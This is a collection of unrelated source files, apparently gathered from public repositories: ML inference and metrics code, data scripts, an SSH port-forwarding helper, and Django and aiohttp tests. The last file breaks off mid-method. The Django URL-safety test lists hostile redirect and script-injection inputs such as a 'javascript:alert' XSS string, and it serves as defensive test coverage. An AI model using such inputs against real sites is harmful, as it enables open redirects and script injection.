print('\r>>>>Extracting feature...%03d/%03d'%(index*batchsize, len(testloader)), end='')
if args.model == 'DeepLab':
with torch.no_grad():
output1, output2 = model(inputs)
output_batch = interp(sm(0.5* output1 + output2))
heatmap_output1, heatmap_output2 = output1, output2
#output_batch = interp(sm(output1))
#output_batch = interp(sm(output2))
output1, output2 = model(fliplr(inputs))
output1, output2 = fliplr(output1), fliplr(output2)
output_batch += interp(sm(0.5 * output1 + output2))
heatmap_output1, heatmap_output2 = heatmap_output1+output1, heatmap_output2+output2
#output_batch += interp(sm(output1))
#output_batch += interp(sm(output2))
del output1, output2, inputs
output1, output2 = model(inputs2)
output_batch += interp(sm(0.5* output1 + output2))
#output_batch += interp(sm(output1))
#output_batch += interp(sm(output2))
output1, output2 = model(fliplr(inputs2))
output1, output2 = fliplr(output1), fliplr(output2)
output_batch += interp(sm(0.5 * output1 + output2))
#output_batch += interp(sm(output1))
#output_batch += interp(sm(output2))
del output1, output2, inputs2
output_batch = output_batch.cpu().data.numpy()
heatmap_batch = torch.sum(kl_distance(log_sm(heatmap_output1), sm(heatmap_output2)), dim=1)
heatmap_batch = torch.log(1 + 10*heatmap_batch) # for visualization
heatmap_batch = heatmap_batch.cpu().data.numpy()
#output1, output2 = model(inputs3)
#output_batch += interp(sm(0.5* output1 + output2)).cpu().data.numpy()
#output1, output2 = model(fliplr(inputs3))
#output1, output2 = fliplr(output1), fliplr(output2)
#output_batch += interp(sm(0.5 * output1 + output2)).cpu().data.numpy()
#del output1, output2, inputs3
elif args.model == 'DeeplabVGG' or args.model == 'Oracle':
output_batch = model(Variable(image).cuda())
output_batch = interp(output_batch).cpu().data.numpy()
output_batch = output_batch.transpose(0,2,3,1)
scoremap_batch = np.asarray(np.max(output_batch, axis=3))
output_batch = np.asarray(np.argmax(output_batch, axis=3), dtype=np.uint8)
output_iterator = []
heatmap_iterator = []
scoremap_iterator = []
for i in range(output_batch.shape[0]):
output_iterator.append(output_batch[i,:,:])
heatmap_iterator.append(heatmap_batch[i,:,:]/np.max(heatmap_batch[i,:,:]))
scoremap_iterator.append(1-scoremap_batch[i,:,:]/np.max(scoremap_batch[i,:,:]))
name_tmp = name[i].split('/')[-1]
name[i] = '%s/%s' % (args.save, name_tmp)
with Pool(4) as p:
p.map(save, zip(output_iterator, name) )
p.map(save_heatmap, zip(heatmap_iterator, name) )
p.map(save_scoremap, zip(scoremap_iterator, name) )
del output_batch
return args.save
if __name__ == '__main__':
tt = time.time()
with torch.no_grad():
save_path = main()
print('Time used: {} sec'.format(time.time()-tt))
# os.system('python compute_iou.py ./data/Cityscapes/data/gtFine/val %s'%save_path)
|
the-stack_106_15839
|
import unittest
from datetime import datetime
from django.utils import http
from django.utils.datastructures import MultiValueDict
class TestUtilsHttp(unittest.TestCase):
def test_urlencode(self):
# 2-tuples (the norm)
result = http.urlencode((('a', 1), ('b', 2), ('c', 3)))
self.assertEqual(result, 'a=1&b=2&c=3')
# A dictionary
result = http.urlencode({'a': 1, 'b': 2, 'c': 3})
acceptable_results = [
# Need to allow all of these as dictionaries have to be treated as
# unordered
'a=1&b=2&c=3',
'a=1&c=3&b=2',
'b=2&a=1&c=3',
'b=2&c=3&a=1',
'c=3&a=1&b=2',
'c=3&b=2&a=1'
]
self.assertIn(result, acceptable_results)
result = http.urlencode({'a': [1, 2]}, doseq=False)
self.assertEqual(result, 'a=%5B%271%27%2C+%272%27%5D')
result = http.urlencode({'a': [1, 2]}, doseq=True)
self.assertEqual(result, 'a=1&a=2')
result = http.urlencode({'a': []}, doseq=True)
self.assertEqual(result, '')
# A MultiValueDict
result = http.urlencode(MultiValueDict({
'name': ['Adrian', 'Simon'],
'position': ['Developer']
}), doseq=True)
acceptable_results = [
# MultiValueDicts are similarly unordered
'name=Adrian&name=Simon&position=Developer',
'position=Developer&name=Adrian&name=Simon'
]
self.assertIn(result, acceptable_results)
def test_base36(self):
# reciprocity works
for n in [0, 1, 1000, 1000000]:
self.assertEqual(n, http.base36_to_int(http.int_to_base36(n)))
# bad input
with self.assertRaises(ValueError):
http.int_to_base36(-1)
for n in ['1', 'foo', {1: 2}, (1, 2, 3), 3.141]:
with self.assertRaises(TypeError):
http.int_to_base36(n)
for n in ['#', ' ']:
with self.assertRaises(ValueError):
http.base36_to_int(n)
with self.assertRaises(ValueError) as cm:
http.base36_to_int('1' * 14)
self.assertEqual('Base36 input too large', str(cm.exception))
for n in [123, {1: 2}, (1, 2, 3), 3.141]:
with self.assertRaises(TypeError):
http.base36_to_int(n)
# more explicit output testing
for n, b36 in [(0, '0'), (1, '1'), (42, '16'), (818469960, 'django')]:
self.assertEqual(http.int_to_base36(n), b36)
self.assertEqual(http.base36_to_int(b36), n)
def test_is_safe_url(self):
bad_urls = (
'http://example.com',
'http:///example.com',
'https://example.com',
'ftp://example.com',
r'\\example.com',
r'\\\example.com',
r'/\\/example.com',
r'\\\example.com',
r'\\example.com',
r'\\//example.com',
r'/\/example.com',
r'\/example.com',
r'/\example.com',
'http:///example.com',
r'http:/\//example.com',
r'http:\/example.com',
r'http:/\example.com',
'javascript:alert("XSS")',
'\njavascript:alert(x)',
'\x08//example.com',
r'http://otherserver\@example.com',
r'http:\\testserver\@example.com',
r'http://testserver\me:[email protected]',
r'http://testserver\@example.com',
r'http:\\testserver\confirm\[email protected]',
'http:999999999',
'ftp:9999999999',
'\n',
'http://[2001:cdba:0000:0000:0000:0000:3257:9652/',
'http://2001:cdba:0000:0000:0000:0000:3257:9652]/',
)
for bad_url in bad_urls:
self.assertFalse(
http.is_safe_url(bad_url, allowed_hosts={'testserver', 'testserver2'}),
"%s should be blocked" % bad_url,
)
good_urls = (
'/view/?param=http://example.com',
'/view/?param=https://example.com',
'/view?param=ftp://example.com',
'view/?param=//example.com',
'https://testserver/',
'HTTPS://testserver/',
'//testserver/',
'http://testserver/[email protected]',
'/url%20with%20spaces/',
'path/http:2222222222',
)
for good_url in good_urls:
self.assertTrue(
http.is_safe_url(good_url, allowed_hosts={'otherserver', 'testserver'}),
"%s should be allowed" % good_url,
)
# Valid basic auth credentials are allowed.
self.assertTrue(http.is_safe_url(r'http://user:pass@testserver/', allowed_hosts={'user:pass@testserver'}))
# A path without host is allowed.
self.assertTrue(http.is_safe_url('/confirm/[email protected]'))
# Basic auth without host is not allowed.
self.assertFalse(http.is_safe_url(r'http://testserver\@example.com'))
def test_is_safe_url_secure_param_https_urls(self):
secure_urls = (
'https://example.com/p',
'HTTPS://example.com/p',
'/view/?param=http://example.com',
)
for url in secure_urls:
self.assertTrue(http.is_safe_url(url, allowed_hosts={'example.com'}, require_https=True))
def test_is_safe_url_secure_param_non_https_urls(self):
not_secure_urls = (
'http://example.com/p',
'ftp://example.com/p',
'//example.com/p',
)
for url in not_secure_urls:
self.assertFalse(http.is_safe_url(url, allowed_hosts={'example.com'}, require_https=True))
def test_urlsafe_base64_roundtrip(self):
bytestring = b'foo'
encoded = http.urlsafe_base64_encode(bytestring)
decoded = http.urlsafe_base64_decode(encoded)
self.assertEqual(bytestring, decoded)
def test_urlquote(self):
self.assertEqual(http.urlquote('Paris & Orl\xe9ans'), 'Paris%20%26%20Orl%C3%A9ans')
self.assertEqual(http.urlquote('Paris & Orl\xe9ans', safe="&"), 'Paris%20&%20Orl%C3%A9ans')
self.assertEqual(http.urlunquote('Paris%20%26%20Orl%C3%A9ans'), 'Paris & Orl\xe9ans')
self.assertEqual(http.urlunquote('Paris%20&%20Orl%C3%A9ans'), 'Paris & Orl\xe9ans')
self.assertEqual(http.urlquote_plus('Paris & Orl\xe9ans'), 'Paris+%26+Orl%C3%A9ans')
self.assertEqual(http.urlquote_plus('Paris & Orl\xe9ans', safe="&"), 'Paris+&+Orl%C3%A9ans')
self.assertEqual(http.urlunquote_plus('Paris+%26+Orl%C3%A9ans'), 'Paris & Orl\xe9ans')
self.assertEqual(http.urlunquote_plus('Paris+&+Orl%C3%A9ans'), 'Paris & Orl\xe9ans')
def test_is_same_domain_good(self):
for pair in (
('example.com', 'example.com'),
('example.com', '.example.com'),
('foo.example.com', '.example.com'),
('example.com:8888', 'example.com:8888'),
('example.com:8888', '.example.com:8888'),
('foo.example.com:8888', '.example.com:8888'),
):
self.assertTrue(http.is_same_domain(*pair))
def test_is_same_domain_bad(self):
for pair in (
('example2.com', 'example.com'),
('foo.example.com', 'example.com'),
('example.com:9999', 'example.com:8888'),
):
self.assertFalse(http.is_same_domain(*pair))
class ETagProcessingTests(unittest.TestCase):
def test_parsing(self):
self.assertEqual(
http.parse_etags(r'"" , "etag", "e\\tag", W/"weak"'),
['""', '"etag"', r'"e\\tag"', 'W/"weak"']
)
self.assertEqual(http.parse_etags('*'), ['*'])
# Ignore RFC 2616 ETags that are invalid according to RFC 7232.
self.assertEqual(http.parse_etags(r'"etag", "e\"t\"ag"'), ['"etag"'])
def test_quoting(self):
self.assertEqual(http.quote_etag('etag'), '"etag"') # unquoted
self.assertEqual(http.quote_etag('"etag"'), '"etag"') # quoted
self.assertEqual(http.quote_etag('W/"etag"'), 'W/"etag"') # quoted, weak
class HttpDateProcessingTests(unittest.TestCase):
def test_http_date(self):
t = 1167616461.0
self.assertEqual(http.http_date(t), 'Mon, 01 Jan 2007 01:54:21 GMT')
def test_cookie_date(self):
t = 1167616461.0
self.assertEqual(http.cookie_date(t), 'Mon, 01-Jan-2007 01:54:21 GMT')
def test_parsing_rfc1123(self):
parsed = http.parse_http_date('Sun, 06 Nov 1994 08:49:37 GMT')
self.assertEqual(datetime.utcfromtimestamp(parsed), datetime(1994, 11, 6, 8, 49, 37))
def test_parsing_rfc850(self):
parsed = http.parse_http_date('Sunday, 06-Nov-94 08:49:37 GMT')
self.assertEqual(datetime.utcfromtimestamp(parsed), datetime(1994, 11, 6, 8, 49, 37))
def test_parsing_asctime(self):
parsed = http.parse_http_date('Sun Nov 6 08:49:37 1994')
self.assertEqual(datetime.utcfromtimestamp(parsed), datetime(1994, 11, 6, 8, 49, 37))
|
the-stack_106_15841
|
import numpy as np
import pandas as pd
from copy import copy, deepcopy
from matplotlib import pyplot as plt
from datetime import datetime, timedelta
from matplotlib.backends.backend_pdf import PdfPages
dfheight=pd.read_csv('../data/raw/Results from Val_Roseg_Timelapse in µm per sec.csv')
dfdates=pd.read_csv('../data/raw/image_dates.csv',parse_dates=['time'])
dfw=pd.read_csv('../data/raw/water_dates.csv',parse_dates=['time'])
dfheight=dfheight['Y']
dfheight=3000-dfheight
dfheight=dfheight-1164 #Subtracting additional length from camera
dfheight*=6/170 #170 pixels=6ft
dfh=pd.DataFrame(columns=['time','height','water'])
dfh['time']=dfdates['time']
dfh['water']=dfw['water']
dfh['time']=pd.to_datetime(dfh['time'],format='%Y:%m:%d %H:%M:%S')
dfh['height']=dfheight.apply(lambda x: float(x)*0.3048)
dfh=dfh.set_index('time')
dfh.to_csv('../data/interim/height_data.csv')
df=pd.read_csv('../data/raw/Roseg excel.csv')
df.columns=['doy','time','temp','rh','ws']
df['time']=df['time']/100
d=df['time']
d=d.tolist()
c=df['doy'].tolist()
for i in range(0,df.shape[0]):
if c[i]>300:
df.loc[i,'time']=datetime(2016, 1, 1) + timedelta(days=c[i]-1,hours=d[i])
else:
df.loc[i,'time']=datetime(2017, 1, 1) + timedelta(days=c[i]-1,hours=d[i])
df=df.set_index('time')
for time in dfh.index:
h=dfh.loc[str(time),'height']
w=dfh.loc[str(time),'water']
time=time.replace(hour=time.hour+1,minute=0,second=0)
df.loc[str(time),'height']=h
df.loc[str(time),'water']=w
df=df.dropna()
df.to_csv('../data/interim/roseg_measurements.csv')
pp = PdfPages('../data/processed/plots.pdf')
df['temp'].plot(figsize=(12,8), grid=True)
df['height'].plot(figsize=(12,8), grid=True)
df['water'].plot(figsize=(12,8), grid=True)
pp.savefig()
plt.clf()
pp.close()
|
the-stack_106_15844
|
import select
import socket
import threading
try:
import SocketServer
except ImportError:
import socketserver as SocketServer
def check_if_ipv6(ip):
try:
socket.inet_pton(socket.AF_INET6, ip)
return True
except socket.error:
return False
class LocalPortForwarding:
def __init__(self, port, host, transport):
self.server = None
self.port = port
self.host = host
self.transport = transport
def forward(self, local_port):
class SubHandler(LocalPortForwardingHandler):
port = self.port
host = self.host
ssh_transport = self.transport
self.server = ForwardServer(('', local_port), SubHandler, ipv6=check_if_ipv6(self.host))
t = threading.Thread(target=self.server.serve_forever)
t.setDaemon(True)
t.start()
def close(self):
if self.server:
self.server.shutdown()
class ForwardServer(SocketServer.ThreadingTCPServer):
daemon_threads = True
allow_reuse_address = True
def __init__(self, server_address, RequestHandlerClass, ipv6=False):
if ipv6:
ForwardServer.address_family = socket.AF_INET6
SocketServer.ThreadingTCPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate=True)
class LocalPortForwardingHandler(SocketServer.BaseRequestHandler):
host, port, ssh_transport = None, None, None
def handle(self):
try:
chan = self.ssh_transport.open_channel('direct-tcpip', (self.host, self.port),
self.request.getpeername())
except Exception:
return
if chan is None:
return
while True:
r, w, x = select.select([self.request, chan], [], [])
if self.request in r:
data = self.request.recv(1024)
if len(data) == 0:
break
chan.send(data)
if chan in r:
data = chan.recv(1024)
if len(data) == 0:
break
self.request.send(data)
chan.close()
self.request.close()
|
the-stack_106_15845
|
import random
import pytest
from aiohttp_apiset.jinja2 import template
@template('fake.html')
def handler(request):
return {'req': request}
@template('fake.html')
async def handler2(request):
return {'req': request}
@pytest.mark.parametrize('handler', [
handler, handler2
])
async def test_with_req(swagger_router, handler, mocker):
route = swagger_router.add_route(
'GET', '/jinja2/handler{}'.format(random.randrange(0, 999)), handler)
m = mocker.patch('aiohttp_apiset.jinja2.render_template')
response = await route.handler('request')
assert response is m()
@template('fake.html')
def handler_():
return {}
async def test_without_req(swagger_router, mocker):
route = swagger_router.add_route(
'GET', '/jinja2/handler{}'.format(random.randrange(0, 999)), handler_)
m = mocker.patch('aiohttp_apiset.jinja2.render_template')
response = await route.handler()
assert response is m()
|
the-stack_106_15847
|
# import os
# import cv2
# import numpy as np
#
# INPUT_VIDEO = 'test.mp4'
# OUTPUT_IMG = 'out_my_video'
# os.makedirs(OUTPUT_IMG, exist_ok=True)
#
#
# def print_image(img, frame_diff):
# """
# Place images side-by-side
# """
# new_img = np.zeros([img.shape[0], img.shape[1] * 2, img.shape[2]]) # [height, width*2, channel]
# new_img[:, :img.shape[1], :] = img # place color image on the left side
# new_img[:, img.shape[1]:, 0] = frame_diff # place gray image on the right side
# new_img[:, img.shape[1]:, 1] = frame_diff
# new_img[:, img.shape[1]:, 2] = frame_diff
# return new_img
#
#
# def main(video_path):
# cap = cv2.VideoCapture(video_path) # https://docs.opencv.org/4.0.0/d8/dfe/classcv_1_1VideoCapture.html
# last_gray = None
# idx = -1
# while (True):
# ret, frame = cap.read() # read frames
# idx += 1
# if not ret:
# print('Stopped reading the video (%s)' % video_path)
# break
#
# gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # convert color image to gray
#
# if last_gray is None:
# last_gray = gray
# continue
#
# diff = cv2.absdiff(gray,
# last_gray) # frame difference! https://docs.opencv.org/4.0.0/d2/de8/group__core__array.html#ga6fef31bc8c4071cbc114a758a2b79c14
# cv2.imwrite(os.path.join(OUTPUT_IMG, 'img_%06d.jpg' % idx), print_image(frame, diff))
# last_gray = gray
# print('Done image @ %d...' % idx)
# pass
# pass
#
#
# if __name__ == "__main__":
# print('Running frame difference algorithm on %s' % INPUT_VIDEO)
# main(video_path=INPUT_VIDEO)
# print('* Follow me @ ' + "\x1b[1;%dm" % (34) + ' https://www.facebook.com/minhng.info/' + "\x1b[0m")
# print('* Join GVGroup for discussion @ ' + "\x1b[1;%dm" % (
# 34) + 'https://www.facebook.com/groups/ip.gvgroup/' + "\x1b[0m")
# print('* Thank you ^^~')
#
# print('[NOTE] Run the following command to turn you images in to video:')
# print(
# 'ffmpeg -framerate 24 -f image2 -start_number 1 -i out_my_video/img_%*.jpg -crf 10 -q:v 5 -pix_fmt yuv420p out_video.mp4')
# import the necessary packages
from imutils.video import VideoStream
import argparse
import datetime
import imutils
import time
import cv2
import numpy as np
from keras.models import model_from_json
from keras.preprocessing.image import img_to_array
# parameters for loading data and images
detection_model_path = 'haarcascade/haarcascade_frontalface_default.xml'
# loading models
# load model facial_expression
model_facial_expression = model_from_json(open("model/fer.json", "r").read())
# load weights facial_expression
model_facial_expression.load_weights('model/fer.h5')
EMOTIONS = ["angry", "disgust", "scared", "happy", "sad", "surprised", "neutral"]
face_detection = cv2.CascadeClassifier(detection_model_path)
path_video = "democlassroom.mp4"
video = cv2.VideoCapture(path_video)
width = int(video.get(cv2.CAP_PROP_FRAME_WIDTH))
height = int(video.get(cv2.CAP_PROP_FRAME_HEIGHT))
size = width, height
# Print out the resolution
print(repr(size))
# Set the number of frames and the background
FPS_SMOOTHING = 0.9
# ret, frame1 = video.read()
ret, frame2 = video.read()
frame1 = None
next_frame = 0
fps = 0.0
prev = time.time()
while video.isOpened():
status, color = "No Movement", (0, 255, 0)
no_movement_check = False
now = time.time()
fps = (fps * FPS_SMOOTHING + (1 / (now - prev)) * (1.0 - FPS_SMOOTHING))
print("fps: {:.1f}".format(fps))
ret, frame2 = video.read()
if frame2 is None:
break
if frame1 is None:
frame1 = frame2
difference = cv2.absdiff(frame1, frame2)
thresh = cv2.threshold(difference, 25, 255, cv2.THRESH_BINARY)[1]
gray = cv2.cvtColor(difference, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(gray, (5,5), 0)
_, threshold = cv2.threshold(blur, 20, 255, cv2.THRESH_BINARY)
dilate = cv2.dilate(threshold, None, iterations=3)
contour, _ = cv2.findContours(dilate, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnts= cv2.findContours(dilate.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
# loop over the contours
# for c in cnts:
# # if the contour is too small, ignore it
# # if cv2.contourArea(c) < args["min_area"]:
# # continue
# # compute the bounding box for the contour, draw it on the frame,
# # and update the text
# (x, y, w, h) = cv2.boundingRect(c)
# cv2.rectangle(frame1, (x, y), (x + w, y + h), (0, 255, 0), 2)
# status = "Occupied"
# no_movement_check = True
if cnts is not None:
status = "Occupied"
no_movement_check = True
if next_frame %2 == 0 and no_movement_check:
gray_face = cv2.cvtColor(frame2, cv2.COLOR_BGR2GRAY)
faces = face_detection.detectMultiScale(gray_face, scaleFactor=1.1, minNeighbors=5, minSize=(30, 30),
flags=cv2.CASCADE_SCALE_IMAGE)
print("Kieru gì"+ str(type(faces)))
for (x, y, w, h) in faces:
if y+w >10 and x+h >10:
# cv2.rectangle(frame1, (x_f, y_f), (x_f + w_f, y_f + h_f), (255, 0, 0), 2)
roi = gray[y:y + h, x:x + w]
roi = cv2.resize(roi, (48, 48))
roi = roi.astype("float") / 255.0
roi = img_to_array(roi)
roi = np.expand_dims(roi, axis=0)
preds = model_facial_expression.predict(roi)[0]
# emotion_probability = np.max(preds)
label = EMOTIONS[preds.argmax()]
cv2.putText(frame1, label, (int(x), int(y)), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2)
# cv2.drawContours(frame1, contour, -1, (0, 0, 255), 2)
cv2.putText(frame1, status, (10, 20), cv2.FONT_HERSHEY_SIMPLEX, 0.8, color, 2)
cv2.putText(frame1, datetime.datetime.now().strftime("%A %d %B %Y %I:%M:%S%p"), (10, frame1.shape[0] - 10),
cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 255, 0), 1)
# cv2.putText(frame1, "Fps: " + str(difference), (7, 70), cv2.FONT_HERSHEY_SIMPLEX, 1, (100, 255, 0), 1, cv2.LINE_AA)
cv2.imshow("image", frame1)
frame1 = frame2
next_frame +=1
if cv2.waitKey(40) == ord('q'):
break
video.release()
|
the-stack_106_15851
|
"""Utility methods for Mycroft Precise."""
class TriggerDetector:
"""
Reads predictions and detects activations
This prevents multiple close activations from occurring when
the predictions look like ...!!!..!!...
NOTE: Taken from precise-runner source code
"""
def __init__(self, chunk_size, sensitivity=0.5, trigger_level=3):
self.chunk_size = chunk_size
self.sensitivity = sensitivity
self.trigger_level = trigger_level
self.activation = 0
def update(self, prob):
# type: (float) -> bool
"""Returns whether the new prediction caused an activation"""
chunk_activated = prob > 1.0 - self.sensitivity
if chunk_activated or self.activation < 0:
self.activation += 1
has_activated = self.activation > self.trigger_level
if has_activated or chunk_activated and self.activation < 0:
self.activation = -(8 * 2048) // self.chunk_size
if has_activated:
return True
elif self.activation > 0:
self.activation -= 1
return False
|
the-stack_106_15852
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .custom import http_bearer_challenge_cache as HttpBearerChallengeCache
from .custom.http_bearer_challenge import HttpBearerChallenge
from .custom.key_vault_client import CustomKeyVaultClient as KeyVaultClient
from .custom.key_vault_id import (KeyVaultId,
KeyId,
SecretId,
CertificateId,
CertificateIssuerId,
CertificateOperationId,
StorageAccountId,
StorageSasDefinitionId)
from .custom.key_vault_authentication import KeyVaultAuthentication, KeyVaultAuthBase
from .version import VERSION
__all__ = ['KeyVaultClient',
'KeyVaultId',
'KeyId',
'SecretId',
'CertificateId',
'CertificateIssuerId',
'CertificateOperationId',
'StorageAccountId',
'StorageSasDefinitionId',
'HttpBearerChallengeCache',
'HttpBearerChallenge',
'KeyVaultAuthentication',
'KeyVaultAuthBase']
__version__ = VERSION
|
the-stack_106_15853
|
class Solution:
# @param s, a string
# @return a string
def reverseWords(self, s):
if s is None:
return
s = s.strip()
words = s.split()
words.reverse()
s = " ".join(words)
return s
|
the-stack_106_15854
|
"""
To understand why this file is here, please read:
http://cookiecutter-django.readthedocs.io/en/latest/faq.html#why-is-there-a-django-contrib-sites-directory-in-cookiecutter-django
"""
from django.conf import settings
from django.db import migrations
def update_site_forward(apps, schema_editor):
"""Set site domain and name."""
Site = apps.get_model("sites", "Site")
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
"domain": "e-kondr01.ru",
"name": "RCS Back",
},
)
def update_site_backward(apps, schema_editor):
"""Revert site domain and name to default."""
Site = apps.get_model("sites", "Site")
Site.objects.update_or_create(
id=settings.SITE_ID, defaults={"domain": "example.com", "name": "example.com"}
)
class Migration(migrations.Migration):
dependencies = [("sites", "0002_alter_domain_unique")]
operations = [migrations.RunPython(update_site_forward, update_site_backward)]
|
the-stack_106_15856
|
from sklearn.metrics import roc_auc_score
from sklearn.metrics import roc_curve
import numpy as np
from federatedml.util import consts
import logging
from federatedml.util import LOGGER
from federatedml.evaluation.metrics import classification_metric
from federatedml.evaluation.metrics import regression_metric
from federatedml.evaluation.metrics import clustering_metric
from functools import wraps
class MetricInterface(object):
def __init__(self, pos_label: int, eval_type: str):
self.pos_label = pos_label
self.eval_type = eval_type
def auc(self, labels, pred_scores):
"""
Compute AUC for binary classification.
Parameters
----------
labels: value list. The labels of data set.
pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
Returns
----------
float
The AUC
"""
if self.eval_type == consts.BINARY:
return roc_auc_score(labels, pred_scores)
elif self.eval_type == consts.ONE_VS_REST:
try:
score = roc_auc_score(labels, pred_scores)
except:
score = 0 # in case all labels are 0 or 1
logging.warning("all true labels are 0/1 when running ovr AUC")
return score
else:
logging.warning("auc is just suppose Binary Classification! return None as results")
return None
@staticmethod
def explained_variance(labels, pred_scores):
"""
Compute explain variance
Parameters
----------
labels: value list. The labels of data set.
pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
Returns
----------
float
The explain variance
"""
return regression_metric.ExplainedVariance().compute(labels, pred_scores)
@staticmethod
def mean_absolute_error(labels, pred_scores):
"""
Compute mean absolute error
Parameters
----------
labels: value list. The labels of data set.
pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
Returns
----------
float
A non-negative floating point.
"""
return regression_metric.MAE().compute(labels, pred_scores)
@staticmethod
def mean_squared_error(labels, pred_scores):
"""
Compute mean square error
Parameters
----------
labels: value list. The labels of data set.
pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
Returns
----------
float
A non-negative floating point value
"""
return regression_metric.MSE.compute(labels, pred_scores)
@staticmethod
def median_absolute_error(labels, pred_scores):
"""
Compute median absolute error
Parameters
----------
labels: value list. The labels of data set.
pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
Returns
----------
float
A positive floating point value
"""
return regression_metric.MedianAbsoluteError().compute(labels, pred_scores)
@staticmethod
def r2_score(labels, pred_scores):
"""
Compute R^2 (coefficient of determination) score
Parameters
----------
labels: value list. The labels of data set.
pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
Returns
----------
float
The R^2 score
"""
return regression_metric.R2Score().compute(labels, pred_scores)
@staticmethod
def root_mean_squared_error(labels, pred_scores):
"""
Compute the root of mean square error
Parameters
----------
labels: value list. The labels of data set.
pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
Return
----------
float
A positive floating point value
"""
return regression_metric.RMSE.compute(labels, pred_scores)
@staticmethod
def __to_int_list(array: np.ndarray):
return list(map(int, list(array)))
@staticmethod
def __filt_threshold(thresholds, step):
cuts = list(map(float, np.arange(0, 1, step)))
size = len(list(thresholds))
thresholds.sort(reverse=True)
index_list = [int(size * cut) for cut in cuts]
new_thresholds = [thresholds[idx] for idx in index_list]
return new_thresholds, cuts
def roc(self, labels, pred_scores):
if self.eval_type == consts.BINARY:
fpr, tpr, thresholds = roc_curve(np.array(labels), np.array(pred_scores), drop_intermediate=1)
fpr, tpr, thresholds = list(map(float, fpr)), list(map(float, tpr)), list(map(float, thresholds))
filt_thresholds, cuts = self.__filt_threshold(thresholds=thresholds, step=0.01)
new_thresholds = []
new_tpr = []
new_fpr = []
for threshold in filt_thresholds:
index = thresholds.index(threshold)
new_tpr.append(tpr[index])
new_fpr.append(fpr[index])
new_thresholds.append(threshold)
fpr = new_fpr
tpr = new_tpr
thresholds = new_thresholds
return fpr, tpr, thresholds, cuts
else:
logging.warning("roc_curve is just suppose Binary Classification! return None as results")
fpr, tpr, thresholds, cuts = None, None, None, None
return fpr, tpr, thresholds, cuts
def ks(self, labels, pred_scores):
"""
Compute Kolmogorov-Smirnov
Parameters
----------
labels: value list. The labels of data set.
pred_scores: pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
Returns
----------
max_ks_interval: float max value of each tpr - fpt
fpr:
"""
if self.eval_type == consts.ONE_VS_REST:
try:
rs = classification_metric.KS().compute(labels, pred_scores)
except:
rs = [0, [0], [0], [0], [0]] # in case all labels are 0 or 1
logging.warning("all true labels are 0/1 when running ovr KS")
return rs
else:
return classification_metric.KS().compute(labels, pred_scores)
def lift(self, labels, pred_scores):
"""
Compute lift of binary classification.
Parameters
----------
labels: value list. The labels of data set.
pred_scores: pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
thresholds: value list. This parameter effective only for 'binary'. The predict scores will be 1 if it larger than thresholds, if not,
if will be 0. If not only one threshold in it, it will return several results according to the thresholds. default None
Returns
----------
float
The lift
"""
if self.eval_type == consts.BINARY:
return classification_metric.Lift().compute(labels, pred_scores)
else:
logging.warning("lift is just suppose Binary Classification! return None as results")
return None
def gain(self, labels, pred_scores):
"""
Compute gain of binary classification.
Parameters
----------
labels: value list. The labels of data set.
pred_scores: pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
thresholds: value list. This parameter effective only for 'binary'. The predict scores will be 1 if it larger than thresholds, if not,
if will be 0. If not only one threshold in it, it will return several results according to the thresholds. default None
Returns
----------
float
The gain
"""
if self.eval_type == consts.BINARY:
return classification_metric.Gain().compute(labels, pred_scores)
else:
logging.warning("gain is just suppose Binary Classification! return None as results")
return None
def precision(self, labels, pred_scores):
"""
Compute the precision
Parameters
----------
labels: value list. The labels of data set.
pred_scores: pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
thresholds: value list. This parameter effective only for 'binary'. The predict scores will be 1 if it larger than thresholds, if not,
if will be 0. If not only one threshold in it, it will return several results according to the thresholds. default None
result_filter: value list. If result_filter is not None, it will filter the label results not in result_filter.
Returns
----------
dict
The key is threshold and the value is another dic, which key is label in parameter labels, and value is the label's precision.
"""
if self.eval_type == consts.BINARY:
precision_operator = classification_metric.BiClassPrecision()
metric_scores, score_threshold, cuts = precision_operator.compute(labels, pred_scores)
return metric_scores, cuts, score_threshold
elif self.eval_type == consts.MULTY:
precision_operator = classification_metric.MultiClassPrecision()
return precision_operator.compute(labels, pred_scores)
else:
logging.warning("error:can not find classification type:{}".format(self.eval_type))
def recall(self, labels, pred_scores):
"""
Compute the recall
Parameters
----------
labels: value list. The labels of data set.
pred_scores: pred_scores: value list. The predict results of model. It should be corresponding to labels each
data.
Returns
----------
dict
The key is threshold and the value is another dic, which key is label in parameter labels, and value is the
label's recall.
"""
if self.eval_type == consts.BINARY:
recall_operator = classification_metric.BiClassRecall()
recall_res, thresholds, cuts = recall_operator.compute(labels, pred_scores)
return recall_res, cuts, thresholds
elif self.eval_type == consts.MULTY:
recall_operator = classification_metric.MultiClassRecall()
return recall_operator.compute(labels, pred_scores)
else:
logging.warning("error:can not find classification type:{}".format(self.eval_type))
def accuracy(self, labels, pred_scores, normalize=True):
"""
Compute the accuracy
Parameters
----------
labels: value list. The labels of data set.
pred_scores: pred_scores: value list. The predict results of model. It should be corresponding to labels each data.
normalize: bool. If true, return the fraction of correctly classified samples, else returns the number of correctly classified samples
Returns
----------
dict
the key is threshold and the value is the accuracy of this threshold.
"""
if self.eval_type == consts.BINARY:
acc_operator = classification_metric.BiClassAccuracy()
